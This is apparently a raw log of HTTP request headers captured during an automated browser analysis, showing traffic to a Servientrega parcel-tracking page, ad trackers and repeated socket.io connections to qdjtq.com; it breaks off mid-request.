Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mug2M&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mufNo&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mufNn&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mugVR&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mug2M&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mug2V&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muhGe HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /WebSitePortal/RastreoEnvio.html HTTP/1.1Host: mobile.servientrega.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /WebSitePortal/assets/css/plug.min.css HTTP/1.1Host: mobile.servientrega.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mobile.servientrega.com/WebSitePortal/RastreoEnvio.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /WebSitePortal/assets/css/app.css HTTP/1.1Host: mobile.servientrega.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mobile.servientrega.com/WebSitePortal/RastreoEnvio.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /WebSitePortal/assets/css/appb.css HTTP/1.1Host: mobile.servientrega.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mobile.servientrega.com/WebSitePortal/RastreoEnvio.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muhGe HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muhiq&sid=cG417RpQ48wOMxxtAHt7 HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=cG417RpQ48wOMxxtAHt7 HTTP/1.1Host: qdjtq.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://qdjtq.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 9MIHJt+5Bq2Dr2l8Ee7YQA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /WebSitePortal/js/rastreo.js HTTP/1.1Host: mobile.servientrega.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mobile.servientrega.com/WebSitePortal/RastreoEnvio.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /WebSitePortal/assets/img/icons/ico_rastreo.png HTTP/1.1Host: mobile.servientrega.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mobile.servientrega.com/WebSitePortal/RastreoEnvio.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muiHu&sid=cG417RpQ48wOMxxtAHt7 HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/303367017008635?v=2.9.168&r=stable&domain=www.servientrega.com&hme=3ba426d944c98eb3ce406a0f93fc097d0320a486b65b445a33b2eda3a5aa3429&ex_m=70%2C119%2C105%2C109%2C61%2C4%2C98%2C69%2C16%2C95%2C87%2C51%2C54%2C170%2C173%2C185%2C181%2C182%2C184%2C29%2C99%2C53%2C76%2C183%2C165%2C168%2C178%2C179%2C186%2C129%2C41%2C34%2C141%2C15%2C50%2C192%2C191%2C131%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C91%2C17%2C14%2C94%2C90%2C89%2C106%2C52%2C108%2C39%2C107%2C30%2C92%2C26%2C166%2C169%2C138%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C74%2C100%2C27%2C75%2C9%2C8%2C79%2C48%2C21%2C102%2C101%2C103%2C96%2C10%2C20%2C3%2C38%2C19%2C84%2C56%2C82%2C33%2C73%2C0%2C93%2C32%2C81%2C86%2C47%2C46%2C85%2C37%2C5%2C88%2C80%2C44%2C35%2C83%2C2%2C36%2C63%2C42%2C104%2C45%2C78%2C68%2C110%2C60%2C59%2C31%2C97%2C58%2C55%2C49%2C77%2C72%2C24%2C111 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mobile.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-ST8S2VTEC8&gacid=803119929.1727397022&gtm=45je49p0v870173400z8811039284za200zb811039284&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101747727&z=894608372 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muhin&sid=cG417RpQ48wOMxxtAHt7 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muhiq&sid=cG417RpQ48wOMxxtAHt7 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=303367017008635&ev=PageView&dl=https%3A%2F%2Fmobile.servientrega.com%2FWebSitePortal%2FRastreoEnvio.html&rl=https%3A%2F%2Fwww.servientrega.com%2F&if=true&ts=1727397023311&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&cs_est=true&ler=other&cdl=API_unavailable&it=1727397021957&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mobile.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=303367017008635&ev=PageView&dl=https%3A%2F%2Fmobile.servientrega.com%2FWebSitePortal%2FRastreoEnvio.html&rl=https%3A%2F%2Fwww.servientrega.com%2F&if=true&ts=1727397023311&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&cs_est=true&ler=other&cdl=API_unavailable&it=1727397021957&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger, event-sourceReferer: https://mobile.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/303367017008635?v=2.9.168&r=stable&domain=www.servientrega.com&hme=3ba426d944c98eb3ce406a0f93fc097d0320a486b65b445a33b2eda3a5aa3429&ex_m=70%2C119%2C105%2C109%2C61%2C4%2C98%2C69%2C16%2C95%2C87%2C51%2C54%2C170%2C173%2C185%2C181%2C182%2C184%2C29%2C99%2C53%2C76%2C183%2C165%2C168%2C178%2C179%2C186%2C129%2C41%2C34%2C141%2C15%2C50%2C192%2C191%2C131%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C91%2C17%2C14%2C94%2C90%2C89%2C106%2C52%2C108%2C39%2C107%2C30%2C92%2C26%2C166%2C169%2C138%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C74%2C100%2C27%2C75%2C9%2C8%2C79%2C48%2C21%2C102%2C101%2C103%2C96%2C10%2C20%2C3%2C38%2C19%2C84%2C56%2C82%2C33%2C73%2C0%2C93%2C32%2C81%2C86%2C47%2C46%2C85%2C37%2C5%2C88%2C80%2C44%2C35%2C83%2C2%2C36%2C63%2C42%2C104%2C45%2C78%2C68%2C110%2C60%2C59%2C31%2C97%2C58%2C55%2C49%2C77%2C72%2C24%2C111 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mui_T&sid=cG417RpQ48wOMxxtAHt7 HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muiHu&sid=cG417RpQ48wOMxxtAHt7 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muiHw&sid=cG417RpQ48wOMxxtAHt7 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /WebSitePortal/js/rastreo.js HTTP/1.1Host: mobile.servientrega.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.520345425.1727397020; _ga_ST8S2VTEC8=GS1.1.1727397021.1.0.1727397021.60.0.0; _ga=GA1.2.803119929.1727397022; _gid=GA1.2.1855181412.1727397022; _gat=1
Source: global trafficHTTP traffic detected: GET /WebSitePortal/assets/img/icons/ico_rastreo.png HTTP/1.1Host: mobile.servientrega.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.520345425.1727397020; _ga_ST8S2VTEC8=GS1.1.1727397021.1.0.1727397021.60.0.0; _ga=GA1.2.803119929.1727397022; _gid=GA1.2.1855181412.1727397022; _gat=1
Source: global trafficHTTP traffic detected: GET /tr/?id=303367017008635&ev=PageView&dl=https%3A%2F%2Fmobile.servientrega.com%2FWebSitePortal%2FRastreoEnvio.html&rl=https%3A%2F%2Fwww.servientrega.com%2F&if=true&ts=1727397023311&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&cs_est=true&ler=other&cdl=API_unavailable&it=1727397021957&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=303367017008635&ev=PageView&dl=https%3A%2F%2Fmobile.servientrega.com%2FWebSitePortal%2FRastreoEnvio.html&rl=https%3A%2F%2Fwww.servientrega.com%2F&if=true&ts=1727397023311&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&cs_est=true&ler=other&cdl=API_unavailable&it=1727397021957&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sth0d7m9clo4y72mjm8vh3.js HTTP/1.1Host: sth0d7m9clo4y72mjm8vh3.s.decidata.tvConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.servientrega.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mujkk HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sth0d7m9clo4y72mjm8vh3.js HTTP/1.1Host: sth0d7m9clo4y72mjm8vh3.s.decidata.tvConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/999069541179688?v=2.9.168&r=stable&domain=www.servientrega.com&hme=3ba426d944c98eb3ce406a0f93fc097d0320a486b65b445a33b2eda3a5aa3429&ex_m=70%2C119%2C105%2C109%2C61%2C4%2C98%2C69%2C16%2C95%2C87%2C51%2C54%2C170%2C173%2C185%2C181%2C182%2C184%2C29%2C99%2C53%2C76%2C183%2C165%2C168%2C178%2C179%2C186%2C129%2C41%2C34%2C141%2C15%2C50%2C192%2C191%2C131%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C91%2C17%2C14%2C94%2C90%2C89%2C106%2C52%2C108%2C39%2C107%2C30%2C92%2C26%2C166%2C169%2C138%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C74%2C100%2C27%2C75%2C9%2C8%2C79%2C48%2C21%2C102%2C101%2C103%2C96%2C10%2C20%2C3%2C38%2C19%2C84%2C56%2C82%2C33%2C73%2C0%2C93%2C32%2C81%2C86%2C47%2C46%2C85%2C37%2C5%2C88%2C80%2C44%2C35%2C83%2C2%2C36%2C63%2C42%2C104%2C45%2C78%2C68%2C110%2C60%2C59%2C31%2C97%2C58%2C55%2C49%2C77%2C72%2C24%2C111%2C198%2C197%2C199%2C204%2C205%2C206%2C202%2C194%2C130%2C132%2C161%2C193%2C195%2C120%2C155%2C143%2C149%2C187%2C188%2C127%2C230%2C114%2C124%2C125%2C231%2C163%2C117%2C233%2C164%2C134%2C121%2C152%2C146%2C112 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 